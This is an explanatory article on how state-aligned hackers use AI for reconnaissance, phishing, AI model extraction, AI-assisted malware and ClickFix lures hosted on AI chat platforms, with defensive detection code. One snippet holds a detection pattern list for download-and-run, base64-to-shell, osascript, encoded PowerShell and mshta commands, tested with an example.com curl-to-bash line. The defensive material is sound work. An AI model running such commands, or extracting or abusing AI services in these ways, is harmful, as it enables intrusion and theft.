Artificial intelligence is transforming industries at unprecedented speed, but it is also reshaping the global cyber threat landscape. Governments, enterprises, and cybersecurity experts now confront a new reality: state-sponsored hackers are weaponizing AI to scale, automate, and refine their cyberattacks.

From AI-generated phishing campaigns to malware that dynamically generates its own code, nation-backed threat actors are embedding artificial intelligence across nearly every stage of the attack lifecycle. Security researchers warn that this shift is accelerating reconnaissance, improving social engineering success rates, and lowering the technical barriers to launching sophisticated intrusions.

This article examines how state-aligned cyber groups exploit AI tools: the techniques they deploy, the emerging malware frameworks and underground AI marketplaces that support them, and what enterprises must do to defend against this rapidly evolving threat.

The Rise of AI-Powered State Cyber Operations

State-sponsored hacking groups, often referred to as Advanced Persistent Threats (APTs), have long been among the most capable actors in cyberspace. Backed by government funding, intelligence support, and strategic mandates, these groups typically focus on:

- Defense and military organizations

- Critical infrastructure

- Government agencies

- Technology providers

- Financial systems

Historically, their operations required significant manual effort: target research, language translation, drafting phishing messages, malware coding, and operational testing.

AI has changed that equation.

Large language models (LLMs) and generative AI platforms now enable attackers to:

- Automate technical research

- Generate convincing phishing content

- Write or refine malware code

- Translate communications fluently

- Simulate convincing personas

The result is faster, cheaper, and more scalable cyber espionage and disruption campaigns.

AI Embedded Across the Cyberattack Lifecycle

Modern cyberattacks follow a structured lifecycle:

- Reconnaissance

- Target profiling

- Social engineering

- Initial access

- Malware deployment

- Persistence and lateral movement

State-sponsored hackers are now using AI at nearly every stage.

Productivity Gains for Threat Actors

AI tools enable attackers to process vast open-source datasets in a fraction of the time manual research would take. They can automatically map organizational hierarchies, identify decision-makers, and analyze digital footprints.

In effect, AI acts as a force multiplier, allowing smaller cyber teams to execute operations that previously required large intelligence units.

AI-Driven Reconnaissance Targeting the Defense Sector

One of the most prominent uses of AI among state actors is reconnaissance: gathering intelligence on targets before launching attacks.

Iranian Operations and Persona Engineering

Iran-aligned threat groups have leveraged generative AI platforms to enhance social engineering campaigns.

By supplying biographical details about a target (employment history, academic background, or public speaking engagements), attackers can generate:

- Realistic outreach emails

- Professional networking messages

- Partnership proposals

- Media interview requests

These AI-generated personas are designed to appear credible and contextually relevant.

Language translation capabilities further enhance deception. Attackers can craft fluent messages in English, Korean, Japanese, or other languages, even without native speakers on the team.

This removes many of the traditional phishing red flags, such as:

- Poor grammar

- Awkward phrasing

- Cultural inaccuracies

The likely result is higher engagement from targets.

North Korean AI-Enhanced Target Profiling

North Korean state-linked cyber units have also integrated AI into their reconnaissance operations, particularly for targeting the defense and technology sectors.

Their campaigns often involve impersonating recruiters or corporate partners to lure victims.

Using AI tools, attackers can:

- Aggregate open-source intelligence on companies

- Identify employees in sensitive technical roles

- Analyze job descriptions and responsibilities

- Research salary benchmarks

- Craft tailored recruitment offers

This approach blurs the line between legitimate professional outreach and malicious targeting.

Victims may believe they are engaging with real recruiters, only to be funneled into malware delivery or credential-harvesting schemes.

Social Engineering at Machine Speed

Social engineering remains one of the most effective initial access methods in cyber operations, and AI has made it both faster to produce and more convincing.

AI-Generated Phishing Lures

Modern phishing campaigns now include:

- Context-aware email narratives

- Industry-specific terminology

- Personalized references

- Time-sensitive business scenarios

AI models can generate thousands of phishing variants in minutes, each slightly different, which helps them evade spam filters that match known templates.

Common lure themes include:

- Defense contract updates

- Secure document review requests

- Compliance audits

- Investment partnership proposals

Because AI can tailor tone, vocabulary, and formatting, these messages can bypass traditional detection systems.
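On the defensive side, because these variants are near-copies rather than exact copies, one option is to group messages by content similarity instead of exact signatures. The following is a minimal Python sketch, not a description of any particular filter: it compares messages using overlapping three-word shingles and Jaccard similarity. The function names and the 0.5 threshold are illustrative assumptions.

```python
import re
from itertools import combinations


def shingles(text: str, k: int = 3) -> set[tuple[str, ...]]:
    """Return the set of k-word shingles (overlapping word sequences) in text."""
    words = re.findall(r"[a-z0-9']+", text.lower())
    if len(words) < k:
        # Short messages: treat the whole word sequence as a single shingle.
        return {tuple(words)} if words else set()
    return {tuple(words[i:i + k]) for i in range(len(words) - k + 1)}


def jaccard(a: set, b: set) -> float:
    """Jaccard similarity: size of the intersection divided by size of the union."""
    if not a and not b:
        return 1.0
    return len(a & b) / len(a | b)


def near_duplicate_pairs(messages: list[str], threshold: float = 0.5) -> list[tuple[int, int, float]]:
    """Return (i, j, score) for message pairs whose shingle overlap meets the threshold."""
    sets = [shingles(m) for m in messages]
    pairs = []
    for i, j in combinations(range(len(messages)), 2):
        score = jaccard(sets[i], sets[j])
        if score >= threshold:
            pairs.append((i, j, round(score, 2)))
    return pairs


if __name__ == "__main__":
    msgs = [
        "Please review the attached defense contract update before Friday",
        "Please review the attached defense contract update before Monday",
        "Team lunch is moved to the second floor cafeteria",
    ]
    print(near_duplicate_pairs(msgs))  # → [(0, 1, 0.75)]
```

Comparing every pair scales quadratically, so at high volume a technique such as MinHash with locality-sensitive hashing is commonly used to approximate the same similarity.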



The Surge in AI Model Extraction Attacks

State actors are not only using AI—they are also trying to steal it.

What Are Model Extraction Attacks?

Model extraction, also known as a distillation attack, involves querying an AI system with massive volumes of prompts and using its responses to replicate its behavior.

Attackers aim to:

- Reconstruct reasoning capabilities

- Clone proprietary models

- Replicate response behavior

- Transfer knowledge into local systems

In one observed campaign, attackers issued over 100,000 prompts designed to force an AI model to reveal detailed reasoning outputs.

By analyzing patterns in responses, adversaries attempt to reverse-engineer the model’s intellectual property.

Strategic Motivations

Why steal AI models?

- Reduce dependence on Western AI providers

- Build sovereign cyber capabilities

- Enhance offensive cyber tools

- Accelerate domestic AI development

While frontier models remain heavily protected, persistent extraction attempts highlight the geopolitical value of AI intellectual property.



AI-Integrated Malware: The Next Evolution

Perhaps the most alarming development is malware that actively integrates AI services.

Malware That Writes Its Own Code

Security researchers have identified malware frameworks capable of interacting with AI APIs to generate functionality dynamically.

Instead of shipping fully coded payloads, attackers deploy lightweight loaders that:

- Send prompts to an AI model

- Request specific code modules

- Receive generated source code

- Compile and execute it locally

This can produce largely fileless malware that leaves minimal forensic evidence on disk.

Multi-Layered Obfuscation

AI-integrated malware can:

- Modify its structure per infection

- Generate new command-and-control logic

- Rewrite payload execution paths

- Evade signature-based detection

Because code is generated on demand, signature-based antivirus tools have no stable pattern to match.
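Since the generated code changes per infection, one complementary signal is behavioral: which processes talk to AI APIs at all. The sketch below assumes a hypothetical normalized connection log and flags connections to AI API hostnames from processes outside an allowlist. The domain list is illustrative and incomplete, and the `ConnectionEvent` format, the process names, and the allowlist are assumptions to adapt to your own telemetry.

```python
from dataclasses import dataclass

# Illustrative, incomplete set of public LLM API hostnames (assumption: extend for your environment).
AI_API_DOMAINS = {
    "api.openai.com",
    "api.anthropic.com",
    "generativelanguage.googleapis.com",
}

# Hypothetical allowlist of processes expected to call AI APIs on managed endpoints.
APPROVED_PROCESSES = {"chrome.exe", "msedge.exe", "code.exe"}


@dataclass
class ConnectionEvent:
    """One outbound connection record in a hypothetical normalized log format."""
    host: str
    process: str
    dest_domain: str


def is_ai_domain(domain: str) -> bool:
    """True if domain is a listed AI API host or a subdomain of one."""
    domain = domain.lower().rstrip(".")
    return any(domain == d or domain.endswith("." + d) for d in AI_API_DOMAINS)


def flag_unexpected_ai_traffic(events: list[ConnectionEvent]) -> list[ConnectionEvent]:
    """Return connections to AI API hosts made by processes outside the allowlist."""
    return [
        e for e in events
        if is_ai_domain(e.dest_domain) and e.process.lower() not in APPROVED_PROCESSES
    ]


if __name__ == "__main__":
    events = [
        ConnectionEvent("ws-042", "chrome.exe", "api.openai.com"),
        ConnectionEvent("ws-017", "wscript.exe", "generativelanguage.googleapis.com"),
        ConnectionEvent("ws-017", "svchost.exe", "update.example.com"),
    ]
    for e in flag_unexpected_ai_traffic(events):
        print(e.host, e.process, e.dest_domain)
    # → ws-017 wscript.exe generativelanguage.googleapis.com
```

This is a weak signal on its own: legitimate tools also call these services, and attackers can route requests through proxies or other infrastructure.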

Phishing Kits Accelerated by AI Code Generation

AI is also speeding up the creation of cybercrime toolkits.

One observed phishing framework impersonated a major cryptocurrency exchange to harvest login credentials.

Researchers believe AI coding assistants helped build:

- Fake login portals

- Backend credential capture systems

- Automated wallet draining scripts

Even moderately skilled attackers can now produce polished, professional-grade phishing kits, which dramatically expands the pool of capable threat actors.



ClickFix Campaigns and AI Chat Platform Abuse

A particularly novel tactic involves abusing public AI chat platforms to distribute malware.

How the Attack Works

- Attackers generate “help guides” using AI

- The guides include malicious command-line scripts

- Content is hosted on trusted AI domains

- Victims are directed to shared chat links

- Users execute commands believing they are legitimate fixes

Because the content resides on reputable platforms, it appears trustworthy.

This technique has been used to distribute macOS-targeting malware through multi-stage infection chains.

It represents a dangerous convergence of:

- Social engineering

- Platform trust exploitation

- AI content generation

Underground Marketplaces for AI Cyber Tools

Despite their sophistication, many state actors lack the infrastructure to build proprietary AI systems at scale.

Instead, they turn to underground ecosystems.

Stolen API Keys Fuel Operations

Cybercriminal forums, particularly Russian- and English-language communities, actively trade:

- Stolen AI API credentials

- Access tokens

- Preconfigured automation scripts

With valid stolen keys, attackers can access commercial AI platforms without revealing their own identities.

Fake “Custom AI” Toolkits

Some underground products advertise autonomous malware generation or phishing automation capabilities.

Investigations often reveal that these tools are simply wrappers around commercial AI services, powered by stolen access.

This black-market economy lowers the barrier to entry for AI-enabled cybercrime.

Defensive Actions by AI Providers

Technology companies are actively countering AI misuse.

Mitigation strategies include:

- Account suspensions tied to malicious activity

- API key revocations

- Prompt monitoring

- Abuse detection classifiers

- Output filtering

AI models are also being trained to refuse assistance with:

- Malware development

- Phishing generation

- Exploit research

These safeguards aim to balance open innovation with security protections.
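Prompt monitoring and abuse detection can begin with simple volume checks; the extraction campaign described earlier issued over 100,000 prompts. Below is a minimal sketch of a per-account sliding-window counter, assuming request timestamps in seconds that arrive in nondecreasing order. The `QueryVolumeMonitor` class and its limits are hypothetical, and real abuse detection would also weigh features such as prompt content and diversity rather than volume alone.

```python
from collections import defaultdict, deque


class QueryVolumeMonitor:
    """Flag accounts whose request count inside a sliding time window exceeds a limit.

    Assumption: timestamps are seconds and arrive in nondecreasing order per account.
    The window and limit are illustrative, not values used by any provider.
    """

    def __init__(self, window_seconds: float, max_requests: int) -> None:
        self.window_seconds = window_seconds
        self.max_requests = max_requests
        # One queue of recent request timestamps per account.
        self._timestamps: defaultdict[str, deque] = defaultdict(deque)

    def record(self, account_id: str, timestamp: float) -> bool:
        """Record one request; return True if the account is now over the limit."""
        window = self._timestamps[account_id]
        window.append(timestamp)
        # Evict requests that have fallen out of the sliding window.
        while window and window[0] <= timestamp - self.window_seconds:
            window.popleft()
        return len(window) > self.max_requests


if __name__ == "__main__":
    monitor = QueryVolumeMonitor(window_seconds=60, max_requests=3)
    print([monitor.record("acct-a", t) for t in (0, 10, 20, 30, 100)])
    # → [False, False, False, True, False]
```

A deque keeps eviction cheap because old timestamps always leave from the front, so each request is appended and removed at most once.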

Has AI Changed the Cyber Threat Landscape Fundamentally?

Despite alarming developments, researchers caution against overstating the shift.

So far:

- AI has improved attacker efficiency

- It has not created entirely new attack classes

- Breakthrough offensive capabilities remain limited

In other words, AI is so far an accelerator in cyber warfare, not yet a revolution.

However, as models grow more autonomous and multimodal, the risk profile will expand.

Regional Risk: Asia-Pacific in Focus

Enterprise security teams in the Asia-Pacific region face heightened exposure.

Chinese and North Korean state-aligned groups remain highly active in:

- Defense contracting

- Semiconductor manufacturing

- Telecommunications

- Critical infrastructure

AI-enhanced reconnaissance and phishing make these campaigns harder to detect.

Organizations in India, Japan, South Korea, Australia, and Southeast Asia must assume AI-augmented targeting is already underway.

How Enterprises Can Defend Against AI-Augmented Attacks

To counter next-generation threats, organizations must modernize cybersecurity strategies.

1. Strengthen Identity Security

- Enforce phishing-resistant MFA

- Monitor credential misuse

- Implement zero-trust access models

2. Enhance Email and Communication Filtering

- Deploy AI-based phishing detection

- Analyze linguistic anomalies

- Scan for impersonation patterns
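Scanning for impersonation often starts with sender domains that closely resemble trusted ones. A minimal sketch, assuming a hypothetical list of protected domains, flags a sender domain that is within a small edit (Levenshtein) distance of a protected domain without matching it exactly. The function names and the distance limit of 2 are illustrative choices.

```python
def levenshtein(a: str, b: str) -> int:
    """Minimum number of single-character insertions, deletions, or substitutions."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, start=1):
        curr = [i]
        for j, cb in enumerate(b, start=1):
            curr.append(min(
                prev[j] + 1,               # delete ca
                curr[j - 1] + 1,           # insert cb
                prev[j - 1] + (ca != cb),  # substitute (free if characters match)
            ))
        prev = curr
    return prev[-1]


def lookalike_matches(sender_domain: str, protected: list[str], max_distance: int = 2) -> list[str]:
    """Return protected domains that sender_domain closely resembles without matching exactly."""
    sender = sender_domain.lower().rstrip(".")
    return [
        d for d in protected
        if sender != d and levenshtein(sender, d) <= max_distance
    ]


if __name__ == "__main__":
    protected = ["example-defense.com", "partner-corp.com"]  # hypothetical protected domains
    print(lookalike_matches("examp1e-defense.com", protected))  # → ['example-defense.com']
    print(lookalike_matches("example-defense.com", protected))  # → []
```

Edit distance misses visually confusable Unicode characters; Unicode Technical Standard #39 defines confusable-character data that can be used to normalize domains before comparison.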

3. Monitor AI Platform Abuse

- Restrict public sharing of internal AI chats

- Audit prompt logs

- Block malicious command scripts
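Blocking malicious command scripts can include screening commands that users are told to paste into a terminal or Run dialog, the final step in the ClickFix chain described earlier. The sketch below checks a command string against a few illustrative regular expressions for patterns commonly seen in such lures. The pattern names and the list itself are assumptions, not a complete ruleset.

```python
import re

# Illustrative patterns often seen in "paste this into your terminal" lures.
# Assumption: a starting point only, not a complete or authoritative ruleset.
SUSPICIOUS_PATTERNS = {
    "download piped to shell": re.compile(r"\b(curl|wget)\b[^|]*\|\s*(sudo\s+)?(ba|z)?sh\b"),
    "base64 decoded into shell": re.compile(r"base64\s+(-d|--decode|-D)\b[^|]*\|\s*(ba|z)?sh\b"),
    "inline AppleScript": re.compile(r"\bosascript\s+-e\b"),
    "encoded PowerShell": re.compile(r"\bpowershell(\.exe)?\b.*\s-(e|enc|encodedcommand)\s", re.IGNORECASE),
    "remote HTA via mshta": re.compile(r"\bmshta(\.exe)?\s+https?://", re.IGNORECASE),
}


def classify_command(command: str) -> list[str]:
    """Return the names of suspicious patterns that match a pasted command string."""
    return [name for name, pattern in SUSPICIOUS_PATTERNS.items() if pattern.search(command)]


if __name__ == "__main__":
    print(classify_command("curl -fsSL https://example.com/fix.sh | bash"))
    # → ['download piped to shell']
    print(classify_command("ls -la ~/Downloads"))  # → []
```

Pattern matching like this is easy to evade with obfuscation, so it works best as one layer alongside endpoint behavioral monitoring.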

4. Secure API Keys and Cloud Credentials

- Rotate keys regularly

- Monitor abnormal usage

- Implement least-privilege access
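Key rotation and usage monitoring can both be checked mechanically against a key inventory. The sketch below assumes a hypothetical `ApiKeyRecord` holding a creation date and daily request counts; it reports keys older than a rotation limit and a latest day that exceeds the historical mean by more than three standard deviations. The 90-day interval and the three-sigma threshold are illustrative choices, not a standard.

```python
from dataclasses import dataclass
from datetime import date
from statistics import mean, pstdev


@dataclass
class ApiKeyRecord:
    """Hypothetical inventory entry for one API key."""
    key_id: str
    created: date
    daily_requests: list[int]  # oldest first; last element is the most recent day


def audit_key(record: ApiKeyRecord, today: date,
              max_age_days: int = 90, z_limit: float = 3.0) -> list[str]:
    """Return findings for one key: overdue rotation and/or an unusual usage spike."""
    findings = []
    age = (today - record.created).days
    if age > max_age_days:
        findings.append(f"rotation overdue ({age} days old)")
    if len(record.daily_requests) < 8:
        return findings  # need at least 7 days of baseline plus the latest day
    history, latest = record.daily_requests[:-1], record.daily_requests[-1]
    mu, sigma = mean(history), pstdev(history)
    # Floor sigma at 1 so a perfectly flat baseline does not flag trivial changes.
    if latest > mu + z_limit * max(sigma, 1.0):
        findings.append(f"usage spike ({latest} requests vs baseline {mu:.0f})")
    return findings


if __name__ == "__main__":
    leaked = ApiKeyRecord("key-example", date(2024, 1, 1),
                          [100, 110, 95, 105, 98, 102, 100, 5000])
    print(audit_key(leaked, today=date(2024, 6, 1)))
    # → ['rotation overdue (152 days old)', 'usage spike (5000 requests vs baseline 101)']
```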

5. Invest in Threat Intelligence

Track state-sponsored tactics, techniques, and procedures (TTPs) to anticipate AI-driven campaigns.

The Dual-Use Dilemma of Artificial Intelligence

AI’s role in cybersecurity reflects a broader dual-use dilemma.

The same capabilities that empower defenders (automation, anomaly detection, and predictive analytics) also benefit attackers.

This creates an escalating arms race:

- Attackers automate reconnaissance

- Defenders automate detection

- Attackers generate polymorphic malware

- Defenders deploy behavioral analytics

The cycle will intensify as AI matures.

The Future of AI in State Cyber Warfare

Looking ahead, experts anticipate:

- Autonomous vulnerability discovery

- AI-driven exploit chaining

- Deepfake voice phishing (vishing)

- Synthetic identity infiltration

- Real-time adaptive malware

As AI agents gain planning and execution capabilities, cyber operations may become semi-autonomous.

This raises geopolitical, legal, and ethical challenges for global cybersecurity governance.

Conclusion

State-sponsored hackers are rapidly integrating artificial intelligence into their cyber operations, using it to enhance reconnaissance, refine phishing campaigns, accelerate malware development, and exploit trusted digital platforms.

While AI has not yet fundamentally transformed the cyber threat landscape, it has dramatically increased attacker productivity and lowered operational friction.

For enterprises, the implications are clear:

- Social engineering will become more convincing

- Malware will become more evasive

- Reconnaissance will become harder to detect

Defending against these threats requires AI-enabled security, strong identity controls, platform governance, and continuous threat intelligence.

As governments and cybercriminals race to weaponize artificial intelligence, organizations must evolve just as quickly or risk falling behind in the next era of digital conflict.